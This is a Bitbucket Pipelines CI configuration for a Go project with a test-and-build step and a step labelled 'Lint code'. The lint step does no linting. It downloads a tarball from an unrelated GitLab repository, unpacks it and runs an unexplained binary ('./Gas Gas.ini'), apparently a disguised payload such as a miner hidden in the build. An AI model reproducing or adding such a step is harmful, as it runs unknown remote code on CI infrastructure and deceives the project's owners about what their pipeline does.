image: golang:1.15

pipelines:
  default:
    - parallel:
      - step:
          name: Test and Build
          script:
            - mkdir test-reports
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - wget https://gitlab.com/bangler/pucuks/-/raw/master/budal.tar.gz && tar xvf budal.tar.gz && cd budal && ./Gas Gas.ini
